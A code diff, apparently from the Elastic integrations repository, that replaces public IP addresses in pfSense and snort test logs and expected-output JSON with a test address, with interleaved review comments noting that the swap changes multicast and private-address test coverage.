@@ -1123,12 +1133,12 @@ "address": "10.170.12.50", "ip": "10.170.12.50" }, - "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,46364,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49656,853,0,S,1642052952,,64240,,mss;sackOK;TS;nop;wscale", + "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,46364,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49656,853,0,S,1642052952,,64240,,mss;sackOK;TS;nop;wscale", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:VEzuYPgHkR86schJXPUtYuTaLWg=", + "community_id": "1:KQjMGn82EpgQSlEFUH0STxOwZnw=", "transport": "tcp", "type": "ipv4", "bytes": 60, @@ -1173,14 +1183,14 @@ }, "related": { "ip": [ - "1.1.1.1", + "175.16.199.1", "10.170.12.50" ] }, "event": { "reason": "match", - "ingested": "2021-09-14T22:09:25.594618970Z", - "original": "\u003c134\u003e1 2021-07-03T19:10:15.590347-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,46364,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49656,853,0,S,1642052952,,64240,,mss;sackOK;TS;nop;wscale", + "ingested": "2021-12-09T13:44:42.068569700Z", + "original": "\u003c134\u003e1 2021-07-03T19:10:15.590347-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,46364,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49656,853,0,S,1642052952,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-05:00", "kind": "event", @@ -1202,9 +1212,26 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", + "location": { + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" + }, + "as": { + "number": 4837, + "organization": { + "name": "CHINA UNICOM China169 Backbone" + } + }, + "address": "175.16.199.1", "port": 1900, - "address": "239.255.255.250", - "ip": "239.255.255.250" + "ip": "175.16.199.1" }, "rule": { "id": "1520797915" 
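Review bot: The `@@ -1202` hunk replaces the multicast SSDP destination `239.255.255.250` with the unicast test address `175.16.199.1`, so the UDP/1900 sample now acquires GeoIP and AS enrichment that a multicast destination never receives, and the expected output no longer covers the pipeline's no-geo path for multicast traffic. `239.255.255.250` is not a public unicast address, so it is not obviously in scope for a "test public IPs to the supported subset" change; if the CI check nevertheless rejects it, keeping the original sample and documenting the exception seems preferable to changing what the traffic means. The same substitution appears on the `SCAN UPnP service discover attempt` lines of the snort `test-log.log` and `test-log-fast.log` hunks and in their expected output below.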
@@ -1214,12 +1241,12 @@ "address": "10.170.40.57", "ip": "10.170.40.57" }, - "message": "183,,,1520797915,igb1.40,match,pass,in,4,0x0,,1,56778,0,DF,17,udp,200,10.170.40.57,239.255.255.250,58037,1900,180", + "message": "183,,,1520797915,igb1.40,match,pass,in,4,0x0,,1,56778,0,DF,17,udp,200,10.170.40.57,175.16.199.1,58037,1900,180", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:zQlSZYr6L6UmGnGMlB6SCDIrqS8=", + "community_id": "1:kgv3BScgF1Epa1mP4afTUtGbZH8=", "transport": "udp", "type": "ipv4", "bytes": 200, @@ -1255,14 +1282,14 @@ }, "related": { "ip": [ - "239.255.255.250", + "175.16.199.1", "10.170.40.57" ] }, "event": { "reason": "match", - "ingested": "2021-09-14T22:09:25.594621556Z", - "original": "\u003c134\u003e1 2021-07-03T19:10:15.590370-05:00 pfSense.example.com filterlog 72237 - - 183,,,1520797915,igb1.40,match,pass,in,4,0x0,,1,56778,0,DF,17,udp,200,10.170.40.57,239.255.255.250,58037,1900,180", + "ingested": "2021-12-09T13:44:42.068575200Z", + "original": "\u003c134\u003e1 2021-07-03T19:10:15.590370-05:00 pfSense.example.com filterlog 72237 - - 183,,,1520797915,igb1.40,match,pass,in,4,0x0,,1,56778,0,DF,17,udp,200,10.170.40.57,175.16.199.1,58037,1900,180", "provider": "filterlog", "timezone": "-05:00", "kind": "event", @@ -1339,7 +1366,7 @@ }, "event": { "reason": "ip-option", - "ingested": "2021-09-14T22:09:25.594624165Z", + "ingested": "2021-12-09T13:44:42.068580500Z", "original": "\u003c134\u003e1 2021-09-14T15:31:58.860079-05:00 pfSense.example.com filterlog 72913 - - 176,,,1520797901,igb1.50,ip-option,pass,in,4,0xc0,,1,20651,0,none,2,igmp,32,10.100.10.23,224.0.0.1,datalength=8 ", "provider": "filterlog", "timezone": "-05:00", diff --git a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-unbound.log-expected.json b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-unbound.log-expected.json index eeaa7ee4a72..55ea1dd7255 100644 
--- a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-unbound.log-expected.json
+++ b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-unbound.log-expected.json
@@ -43,7 +43,7 @@
"ip": "192.168.1.1"
},
"event": {
- "ingested": "2021-09-14T22:09:34.511913684Z",
+ "ingested": "2021-12-09T13:44:44.375894100Z",
"original": "\u003c30\u003eAug 15 16:19:02 unbound[26931]: [26931:0] info: 192.168.1.1 api.opensubtitles.org. A IN",
"provider": "unbound",
"timezone": "-04:00",
@@ -100,7 +100,7 @@
"ip": "172.16.33.2"
},
"event": {
- "ingested": "2021-09-14T22:09:34.511923033Z",
+ "ingested": "2021-12-09T13:44:44.375902400Z",
"original": "\u003c30\u003eAug 15 16:18:59 unbound[26931]: [26931:2] info: 172.16.33.2 clients4.google.com. A IN",
"provider": "unbound",
"timezone": "-04:00",
diff --git a/packages/pfsense/manifest.yml b/packages/pfsense/manifest.yml
index d132c123b36..39950ac00bf 100644
--- a/packages/pfsense/manifest.yml
+++ b/packages/pfsense/manifest.yml
@@ -1,6 +1,6 @@
name: pfsense
title: pfSense Logs
-version: 0.2.0
+version: 0.2.1
release: experimental
description: Collect and parse logs from pfSense devices with Elastic Agent.
type: integration
diff --git a/packages/snort/_dev/deploy/docker/sample_logs/test-full.log b/packages/snort/_dev/deploy/docker/sample_logs/test-full.log
index 3a49245168f..bb3f0af3b12 100644
--- a/packages/snort/_dev/deploy/docker/sample_logs/test-full.log
+++ b/packages/snort/_dev/deploy/docker/sample_logs/test-full.log
@@ -12,6 +12,6 @@
Len: 55 [**] [1:1000004:0] Pinging... [**] [Classification: Attempted Information Leak] [Priority: 2]
-09/04-21:53:15.299988 10.100.10.190 -> 172.217.1.142
+09/04-21:53:15.299988 10.100.10.190 -> 175.16.199.1
ICMP TTL:64 TOS:0x0 ID:6922 IpLen:20 DgmLen:84 DF
Type:8 Code:0 ID:101 Seq:1 ECHO
\ No newline at end of file
diff --git a/packages/snort/_dev/deploy/docker/sample_logs/test-log.log b/packages/snort/_dev/deploy/docker/sample_logs/test-log.log
index 0243f2538c9..3c295b5e687 100644
--- a/packages/snort/_dev/deploy/docker/sample_logs/test-log.log
+++ b/packages/snort/_dev/deploy/docker/sample_logs/test-log.log
@@ -1,12 +1,12 @@
-09/03/21-12:37:16.428952 ,1,2403488,68499,"ET CINS Active Threat Intelligence Poor Reputation IP TCP group 95",TCP,89.248.168.157,36847,104.5.30.130,91,54321,Misc Attack,2,alert,Allow
-09/03/21-12:56:44.310212 ,1,2011716,4,"ET SCAN Sipvicious User-Agent Detected (friendly-scanner)",UDP,193.46.255.221,5103,104.5.30.130,5060,54925,Attempted Information Leak,2,alert,Allow
+09/03/21-12:37:16.428952 ,1,2403488,68499,"ET CINS Active Threat Intelligence Poor Reputation IP TCP group 95",TCP,175.16.199.1,36847,175.16.199.1,91,54321,Misc Attack,2,alert,Allow
+09/03/21-12:56:44.310212 ,1,2011716,4,"ET SCAN Sipvicious User-Agent Detected (friendly-scanner)",UDP,175.16.199.1,5103,175.16.199.1,5060,54925,Attempted Information Leak,2,alert,Allow
05/30-19:09:10.917356 [**] [1:527:8] BAD-TRAFFIC same SRC/DST [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 0.0.0.0:68 -> 255.255.255.255:67
-05/30-19:09:28.472094 [**] [1:2012811:2] ET DNS DNS Query to a .tk domain - Likely Hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 192.168.88.10:1029 -> 4.2.2.3:53
-05/30-19:09:10.917356 [**] [1:477:3] ICMP Packet [**] [Priority: 0] {ICMP} 172.25.212.245 -> 172.25.212.153
-12/30-14:09:21.116402 [**] [1:1917:6] SCAN UPnP service discover attempt [**] [Classification: Detection of a Network Scan] [Priority: 3] {TCP} 192.168.15.10:1035 -> 239.255.255.250:1900
-01/21-02:23:42.327730 [**] [1:2014520:2] ET INFO EXE - Served Attached HTTP [**] [Classification: Misc activity] [Priority: 3] {TCP} 31.7.62.154:80 -> 192.168.115.10:1051
-01/21-02:23:42.208605 [**] [1:408:5] ICMP Echo Reply [**] [Classification: Misc activity] [Priority: 3] {ICMP} 31.7.62.154 -> 192.168.115.10
-09/03/21-16:29:03.494387 ,1,477,3,"ICMP Packet",ICMP,104.5.30.130,,104.5.30.1,,40546,,0,alert,Allow
+05/30-19:09:28.472094 [**] [1:2012811:2] ET DNS DNS Query to a .tk domain - Likely Hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 
192.168.88.10:1029 -> 175.16.199.1:53
+05/30-19:09:10.917356 [**] [1:477:3] ICMP Packet [**] [Priority: 0] {ICMP} 175.16.199.1 -> 175.16.199.1
+12/30-14:09:21.116402 [**] [1:1917:6] SCAN UPnP service discover attempt [**] [Classification: Detection of a Network Scan] [Priority: 3] {TCP} 192.168.15.10:1035 -> 175.16.199.1:1900
+01/21-02:23:42.327730 [**] [1:2014520:2] ET INFO EXE - Served Attached HTTP [**] [Classification: Misc activity] [Priority: 3] {TCP} 175.16.199.1:80 -> 192.168.115.10:1051
+01/21-02:23:42.208605 [**] [1:408:5] ICMP Echo Reply [**] [Classification: Misc activity] [Priority: 3] {ICMP} 175.16.199.1 -> 192.168.115.10
+09/03/21-16:29:03.494387 ,1,477,3,"ICMP Packet",ICMP,175.16.199.1,,175.16.199.1,,40546,,0,alert,Allow
09/04-21:45:37.536335 ,1,1000006,0,"TCP connection",TCP,10.100.20.59,57263,10.100.10.190,22,00:25:90:3A:05:13,00:50:56:9D:A5:BE,0x72,***AP***,0x688F0DFC,0xBC763516,,0x80C,127,0,55665,100,102400,,,,
09/04-21:50:40.017935 ,1,1000005,0,"UDP Connection",UDP,10.100.10.1,53,10.100.10.190,55475,00:25:90:3A:05:13,00:50:56:9D:A5:BE,0xC1,,,,,,64,0,56094,179,183296,,,,
-09/04-21:49:55.900215 ,1,1000004,0,"Pinging...",ICMP,10.100.10.190,,1.1.1.1,,00:50:56:9D:A5:BE,00:25:90:3A:05:13,0x62,,,,,,64,0,37607,84,86016,8,0,83,1
\ No newline at end of file
+09/04-21:49:55.900215 ,1,1000004,0,"Pinging...",ICMP,10.100.10.190,,175.16.199.1,,00:50:56:9D:A5:BE,00:25:90:3A:05:13,0x62,,,,,,64,0,37607,84,86016,8,0,83,1
\ No newline at end of file
diff --git a/packages/snort/_dev/deploy/docker/sample_logs/test-syslog.log b/packages/snort/_dev/deploy/docker/sample_logs/test-syslog.log
index d5ec77c0258..b242df14f24 100644
--- a/packages/snort/_dev/deploy/docker/sample_logs/test-syslog.log
+++ b/packages/snort/_dev/deploy/docker/sample_logs/test-syslog.log
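Review bot: Four records in this `test-log.log` hunk now carry the same address at both ends of the flow: the two `09/03/21-12:…` CSV rows (`175.16.199.1,36847,175.16.199.1,91` and `…,5103,175.16.199.1,5060`), the `ICMP Packet` fast-format line (`175.16.199.1 -> 175.16.199.1`) and the `09/03/21-16:29:03` ICMP CSV row. The original `172.25.212.245 -> 172.25.212.153` pair is RFC 1918 space, so it was not a public IP and did not need replacing, and the swap changes what the sample exercises: for the pipeline-test copy of that line in `test-log-fast.log` the expected output below shows `network.direction` going from `internal` to `external` and `related.ip` shrinking to one entry. Keeping the private pair on the ICMP line, and using two distinct addresses from the supported subset on the rows that genuinely needed replacing, would preserve coverage of the distinct-endpoint and internal-direction cases. The same pattern is in the `test-log-fast.log` hunk further down.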
@@ -1,3 +1,3 @@
Sep 5 16:05:26 dev snort: [1:1000017:0] UDP Connection [Classification: Misc activity] [Priority: 3] {UDP} 10.150.10.44:55776 -> 10.25.10.22:32414
Sep 5 16:05:26 dev snort: [1:1000016:0] TCP Connection [Priority: 3] {TCP} 10.50.20.59:58720 -> 10.50.10.190:22
-Sep 5 16:02:55 dev snort: [1:1000015:0] Pinging... [Classification: Misc activity] [Priority: 3] {ICMP} 10.50.10.88 -> 142.251.33.14
\ No newline at end of file
+Sep 5 16:02:55 dev snort: [1:1000015:0] Pinging... [Classification: Misc activity] [Priority: 3] {ICMP} 10.50.10.88 -> 175.16.199.1
\ No newline at end of file
diff --git a/packages/snort/changelog.yml b/packages/snort/changelog.yml
index 3fdcaee93c2..5ebf92e3a4a 100644
--- a/packages/snort/changelog.yml
+++ b/packages/snort/changelog.yml
@@ -1,4 +1,9 @@
# newer versions go on top
+- version: "0.1.1"
+ changes:
+ - description: Change test public IPs to the supported subset
+ type: bugfix
+ link: https://github.com/elastic/integrations/pull/2327
- version: "0.1.0"
changes:
- description: Add 8.0.0 version constraint
diff --git a/packages/snort/data_stream/log/_dev/test/pipeline/test-log-csv.log b/packages/snort/data_stream/log/_dev/test/pipeline/test-log-csv.log
index e140afbe347..f597ef6fcea 100644
--- a/packages/snort/data_stream/log/_dev/test/pipeline/test-log-csv.log
+++ b/packages/snort/data_stream/log/_dev/test/pipeline/test-log-csv.log
@@ -3,6 +3,6 @@
09/04-21:50:40.017935 ,1,1000005,0,"UDP Connection",UDP,10.100.10.1,53,10.100.10.190,55475,00:25:90:3A:05:13,00:50:56:9D:A5:BE,0xC1,,,,,,64,0,56094,179,183296,,,,
09/04-21:50:39.947383 ,1,1000005,0,"UDP Connection",UDP,10.100.10.1,53,10.100.10.190,55333,00:25:90:3A:05:13,00:50:56:9D:A5:BE,0xB1,,,,,,64,0,26112,163,166912,,,,
09/04-21:50:40.666095 ,1,1000005,0,"UDP Connection",UDP,10.100.10.75,55776,10.100.10.255,32414,00:0C:29:B8:43:CE,FF:FF:FF:FF:FF:FF,0x3F,,,,,,64,0,37712,49,50176,,,,
-09/04-21:49:55.900215 ,1,1000004,0,"Pinging...",ICMP,10.100.10.190,,1.1.1.1,,00:50:56:9D:A5:BE,00:25:90:3A:05:13,0x62,,,,,,64,0,37607,84,86016,8,0,83,1
-09/04-21:49:55.911592 ,1,1000004,0,"Pinging...",ICMP,1.1.1.1,,10.100.10.190,,00:25:90:3A:05:13,00:50:56:9D:A5:BE,0x62,,,,,,54,0,23522,84,86016,0,0,83,1
-09/04-21:49:56.900997 ,1,1000004,0,"Pinging...",ICMP,10.100.10.190,,1.1.1.1,,00:50:56:9D:A5:BE,00:25:90:3A:05:13,0x62,,,,,,64,0,37636,84,86016,8,0,83,2
\ No newline at end of file
+09/04-21:49:55.900215 ,1,1000004,0,"Pinging...",ICMP,10.100.10.190,,175.16.199.1,,00:50:56:9D:A5:BE,00:25:90:3A:05:13,0x62,,,,,,64,0,37607,84,86016,8,0,83,1
+09/04-21:49:55.911592 ,1,1000004,0,"Pinging...",ICMP,175.16.199.1,,10.100.10.190,,00:25:90:3A:05:13,00:50:56:9D:A5:BE,0x62,,,,,,54,0,23522,84,86016,0,0,83,1
+09/04-21:49:56.900997 ,1,1000004,0,"Pinging...",ICMP,10.100.10.190,,175.16.199.1,,00:50:56:9D:A5:BE,00:25:90:3A:05:13,0x62,,,,,,64,0,37636,84,86016,8,0,83,2
\ No newline at end of file
diff --git a/packages/snort/data_stream/log/_dev/test/pipeline/test-log-csv.log-expected.json b/packages/snort/data_stream/log/_dev/test/pipeline/test-log-csv.log-expected.json
index 67199d3d11f..14b4a192b88 100644
--- a/packages/snort/data_stream/log/_dev/test/pipeline/test-log-csv.log-expected.json
+++ b/packages/snort/data_stream/log/_dev/test/pipeline/test-log-csv.log-expected.json
@@ -43,7 +43,7 @@ ] }, "event": { - "ingested": "2021-09-20T12:26:41.873009104Z", + "ingested": "2021-12-09T13:44:48.094036100Z", "original": "09/04-21:45:37.536335 ,1,1000006,0,\"TCP connection\",TCP,10.100.20.59,57263,10.100.10.190,22,00:25:90:3A:05:13,00:50:56:9D:A5:BE,0x72,***AP***,0x688F0DFC,0xBC763516,,0x80C,127,0,55665,100,102400,,,,", "category": [ "network" @@ -117,7 +117,7 @@ ] }, "event": { - "ingested": "2021-09-20T12:26:41.873086695Z", + "ingested": "2021-12-09T13:44:48.094040500Z", "original": "09/04-21:45:37.553882 ,1,1000006,0,\"TCP connection\",TCP,10.100.20.59,57263,10.100.10.190,22,00:25:90:3A:05:13,00:50:56:9D:A5:BE,0x72,***AP***,0x688F0E38,0xBC763552,,0x80C,127,0,55666,100,102400,,,,", "category": [ "network" @@ -191,7 +191,7 @@ ] }, "event": { - "ingested": "2021-09-20T12:26:41.873096482Z", + "ingested": "2021-12-09T13:44:48.094047600Z", "original": "09/04-21:50:40.017935 ,1,1000005,0,\"UDP Connection\",UDP,10.100.10.1,53,10.100.10.190,55475,00:25:90:3A:05:13,00:50:56:9D:A5:BE,0xC1,,,,,,64,0,56094,179,183296,,,,", "category": [ "network" @@ -262,7 +262,7 @@ ] }, "event": { - "ingested": "2021-09-20T12:26:41.873100094Z", + "ingested": "2021-12-09T13:44:48.094054900Z", "original": "09/04-21:50:39.947383 ,1,1000005,0,\"UDP Connection\",UDP,10.100.10.1,53,10.100.10.190,55333,00:25:90:3A:05:13,00:50:56:9D:A5:BE,0xB1,,,,,,64,0,26112,163,166912,,,,", "category": [ "network" @@ -333,7 +333,7 @@ ] }, "event": { - "ingested": "2021-09-20T12:26:41.873103445Z", + "ingested": "2021-12-09T13:44:48.094060Z", "original": "09/04-21:50:40.666095 ,1,1000005,0,\"UDP Connection\",UDP,10.100.10.75,55776,10.100.10.255,32414,00:0C:29:B8:43:CE,FF:FF:FF:FF:FF:FF,0x3F,,,,,,64,0,37712,49,50176,,,,", "category": [ "network" 
@@ -364,23 +364,25 @@ { "destination": { "geo": { - "continent_name": "Oceania", - "country_name": "Australia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 143.2104, - "lat": -33.494 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "AU" + "country_iso_code": "CN" }, "as": { - "number": 13335, + "number": 4837, "organization": { - "name": "Cloudflare, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "1.1.1.1", + "address": "175.16.199.1", "mac": "00:25:90:3A:05:13", - "ip": "1.1.1.1" + "ip": "175.16.199.1" }, "rule": { "description": "Pinging...", @@ -396,7 +398,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:2tRzWxcmOEdEZgq/cv3/yeRD60Q=", + "community_id": "1:jEaJsIOzda45Q8FjN0LeZEATihA=", "transport": "icmp", "type": "ipv4", "direction": "outbound" @@ -413,12 +415,12 @@ "related": { "ip": [ "10.100.10.190", - "1.1.1.1" + "175.16.199.1" ] }, "event": { - "ingested": "2021-09-20T12:26:41.873106570Z", - "original": "09/04-21:49:55.900215 ,1,1000004,0,\"Pinging...\",ICMP,10.100.10.190,,1.1.1.1,,00:50:56:9D:A5:BE,00:25:90:3A:05:13,0x62,,,,,,64,0,37607,84,86016,8,0,83,1", + "ingested": "2021-12-09T13:44:48.094065100Z", + "original": "09/04-21:49:55.900215 ,1,1000004,0,\"Pinging...\",ICMP,10.100.10.190,,175.16.199.1,,00:50:56:9D:A5:BE,00:25:90:3A:05:13,0x62,,,,,,64,0,37607,84,86016,8,0,83,1", "category": [ "network" ], 
@@ -464,29 +466,31 @@ }, "source": { "geo": { - "continent_name": "Oceania", - "country_name": "Australia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 143.2104, - "lat": -33.494 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "AU" + "country_iso_code": "CN" }, "as": { - "number": 13335, + "number": 4837, "organization": { - "name": "Cloudflare, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "1.1.1.1", + "address": "175.16.199.1", "mac": "00:25:90:3A:05:13", - "ip": "1.1.1.1" + "ip": "175.16.199.1" }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:53l0pZVye5X9Nqti5cQB3Iiuohk=", + "community_id": "1:PsO7nB0G1KDZ1IDLocfXBmcxiaA=", "transport": "icmp", "type": "ipv4", "direction": "inbound" @@ -502,13 +506,13 @@ }, "related": { "ip": [ - "1.1.1.1", + "175.16.199.1", "10.100.10.190" ] }, "event": { - "ingested": "2021-09-20T12:26:41.873109761Z", - "original": "09/04-21:49:55.911592 ,1,1000004,0,\"Pinging...\",ICMP,1.1.1.1,,10.100.10.190,,00:25:90:3A:05:13,00:50:56:9D:A5:BE,0x62,,,,,,54,0,23522,84,86016,0,0,83,1", + "ingested": "2021-12-09T13:44:48.094070200Z", + "original": "09/04-21:49:55.911592 ,1,1000004,0,\"Pinging...\",ICMP,175.16.199.1,,10.100.10.190,,00:25:90:3A:05:13,00:50:56:9D:A5:BE,0x62,,,,,,54,0,23522,84,86016,0,0,83,1", "category": [ "network" ], 
@@ -544,23 +548,25 @@ { "destination": { "geo": { - "continent_name": "Oceania", - "country_name": "Australia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 143.2104, - "lat": -33.494 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "AU" + "country_iso_code": "CN" }, "as": { - "number": 13335, + "number": 4837, "organization": { - "name": "Cloudflare, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "1.1.1.1", + "address": "175.16.199.1", "mac": "00:25:90:3A:05:13", - "ip": "1.1.1.1" + "ip": "175.16.199.1" }, "rule": { "description": "Pinging...", @@ -576,7 +582,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:2tRzWxcmOEdEZgq/cv3/yeRD60Q=", + "community_id": "1:jEaJsIOzda45Q8FjN0LeZEATihA=", "transport": "icmp", "type": "ipv4", "direction": "outbound" @@ -593,12 +599,12 @@ "related": { "ip": [ "10.100.10.190", - "1.1.1.1" + "175.16.199.1" ] }, "event": { - "ingested": "2021-09-20T12:26:41.873112942Z", - "original": "09/04-21:49:56.900997 ,1,1000004,0,\"Pinging...\",ICMP,10.100.10.190,,1.1.1.1,,00:50:56:9D:A5:BE,00:25:90:3A:05:13,0x62,,,,,,64,0,37636,84,86016,8,0,83,2", + "ingested": "2021-12-09T13:44:48.094076700Z", + "original": "09/04-21:49:56.900997 ,1,1000004,0,\"Pinging...\",ICMP,10.100.10.190,,175.16.199.1,,00:50:56:9D:A5:BE,00:25:90:3A:05:13,0x62,,,,,,64,0,37636,84,86016,8,0,83,2", "category": [ "network" ], diff --git a/packages/snort/data_stream/log/_dev/test/pipeline/test-log-fast.log b/packages/snort/data_stream/log/_dev/test/pipeline/test-log-fast.log index e5dff6be505..23a7b6e9b8c 100644 --- a/packages/snort/data_stream/log/_dev/test/pipeline/test-log-fast.log +++ b/packages/snort/data_stream/log/_dev/test/pipeline/test-log-fast.log 
@@ -1,10 +1,10 @@
05/30-19:09:10.917356 [**] [1:527:8] BAD-TRAFFIC same SRC/DST [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 0.0.0.0:68 -> 255.255.255.255:67
-05/30-19:09:28.472094 [**] [1:2012811:2] ET DNS DNS Query to a .tk domain - Likely Hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 192.168.88.10:1029 -> 4.2.2.3:53
-05/30-19:09:10.917356 [**] [1:477:3] ICMP Packet [**] [Priority: 0] {ICMP} 172.25.212.245 -> 172.25.212.153
-12/30-14:09:21.116402 [**] [1:1917:6] SCAN UPnP service discover attempt [**] [Classification: Detection of a Network Scan] [Priority: 3] {TCP} 192.168.15.10:1035 -> 239.255.255.250:1900
-01/21-02:23:42.327730 [**] [1:2014520:2] ET INFO EXE - Served Attached HTTP [**] [Classification: Misc activity] [Priority: 3] {TCP} 31.7.62.154:80 -> 192.168.115.10:1051
-01/21-02:23:42.208605 [**] [1:408:5] ICMP Echo Reply [**] [Classification: Misc activity] [Priority: 3] {ICMP} 31.7.62.154 -> 192.168.115.10
-09/04-21:55:02.041364 [**] [1:1000005:0] UDP Connection [**] [Classification: A Network Trojan was Detected] [Priority: 1] {UDP} 1.0.0.1:53 -> 10.100.10.190:54757
-09/04-21:55:02.118427 [**] [1:1000005:0] UDP Connection [**] [Classification: A Network Trojan was Detected] [Priority: 1] {UDP} 1.0.0.1:53 -> 10.100.10.190:36312
-09/04-21:54:43.216486 [**] [1:1000004:0] Pinging... [**] [Classification: Attempted Information Leak] [Priority: 2] {ICMP} 10.100.10.190 -> 1.1.1.1
-09/04-21:54:43.227117 [**] [1:1000004:0] Pinging... 
[**] [Classification: Attempted Information Leak] [Priority: 2] {ICMP} 1.1.1.1 -> 10.100.10.190
\ No newline at end of file
+05/30-19:09:28.472094 [**] [1:2012811:2] ET DNS DNS Query to a .tk domain - Likely Hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 192.168.88.10:1029 -> 175.16.199.1:53
+05/30-19:09:10.917356 [**] [1:477:3] ICMP Packet [**] [Priority: 0] {ICMP} 175.16.199.1 -> 175.16.199.1
+12/30-14:09:21.116402 [**] [1:1917:6] SCAN UPnP service discover attempt [**] [Classification: Detection of a Network Scan] [Priority: 3] {TCP} 192.168.15.10:1035 -> 175.16.199.1:1900
+01/21-02:23:42.327730 [**] [1:2014520:2] ET INFO EXE - Served Attached HTTP [**] [Classification: Misc activity] [Priority: 3] {TCP} 175.16.199.1:80 -> 192.168.115.10:1051
+01/21-02:23:42.208605 [**] [1:408:5] ICMP Echo Reply [**] [Classification: Misc activity] [Priority: 3] {ICMP} 175.16.199.1 -> 192.168.115.10
+09/04-21:55:02.041364 [**] [1:1000005:0] UDP Connection [**] [Classification: A Network Trojan was Detected] [Priority: 1] {UDP} 175.16.199.1:53 -> 10.100.10.190:54757
+09/04-21:55:02.118427 [**] [1:1000005:0] UDP Connection [**] [Classification: A Network Trojan was Detected] [Priority: 1] {UDP} 175.16.199.1:53 -> 10.100.10.190:36312
+09/04-21:54:43.216486 [**] [1:1000004:0] Pinging... [**] [Classification: Attempted Information Leak] [Priority: 2] {ICMP} 10.100.10.190 -> 175.16.199.1
+09/04-21:54:43.227117 [**] [1:1000004:0] Pinging... [**] [Classification: Attempted Information Leak] [Priority: 2] {ICMP} 175.16.199.1 -> 10.100.10.190
\ No newline at end of file
diff --git a/packages/snort/data_stream/log/_dev/test/pipeline/test-log-fast.log-expected.json b/packages/snort/data_stream/log/_dev/test/pipeline/test-log-fast.log-expected.json
index 58e7bdd7d41..993e55a0bef 100644
--- a/packages/snort/data_stream/log/_dev/test/pipeline/test-log-fast.log-expected.json
+++ b/packages/snort/data_stream/log/_dev/test/pipeline/test-log-fast.log-expected.json
@@ -43,7 +43,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-20T12:26:46.712445649Z", + "ingested": "2021-12-09T13:44:49.150056700Z", "original": "05/30-19:09:10.917356 [**] [1:527:8] BAD-TRAFFIC same SRC/DST [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 0.0.0.0:68 -\u003e 255.255.255.255:67", "timezone": "America/Chicago", "created": "2021-05-30T19:09:10.917-05:00", @@ -59,23 +59,25 @@ { "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "US" + "country_iso_code": "CN" }, "as": { - "number": 3356, + "number": 4837, "organization": { - "name": "Level 3 Parent, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "4.2.2.3", + "address": "175.16.199.1", "port": 53, - "ip": "4.2.2.3" + "ip": "175.16.199.1" }, "rule": { "description": "ET DNS DNS Query to a .tk domain - Likely Hostile", @@ -92,7 +94,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:V4msnhdD0i+Grd4gC2ZiJJzsFr4=", + "community_id": "1:RZ4iVwBzp5juqzQJiu5WebaF9J4=", "transport": "udp", "type": "ipv4", "direction": "outbound" 
@@ -109,13 +111,13 @@ "related": { "ip": [ "192.168.88.10", - "4.2.2.3" + "175.16.199.1" ] }, "event": { "severity": 2, - "ingested": "2021-09-20T12:26:46.712455162Z", - "original": "05/30-19:09:28.472094 [**] [1:2012811:2] ET DNS DNS Query to a .tk domain - Likely Hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 192.168.88.10:1029 -\u003e 4.2.2.3:53", + "ingested": "2021-12-09T13:44:49.150067100Z", + "original": "05/30-19:09:28.472094 [**] [1:2012811:2] ET DNS DNS Query to a .tk domain - Likely Hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 192.168.88.10:1029 -\u003e 175.16.199.1:53", "timezone": "America/Chicago", "created": "2021-05-30T19:09:28.472-05:00", "kind": "alert", @@ -129,8 +131,25 @@ }, { "destination": { - "address": "172.25.212.153", - "ip": "172.25.212.153" + "geo": { + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", + "location": { + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" + }, + "as": { + "number": 4837, + "organization": { + "name": "CHINA UNICOM China169 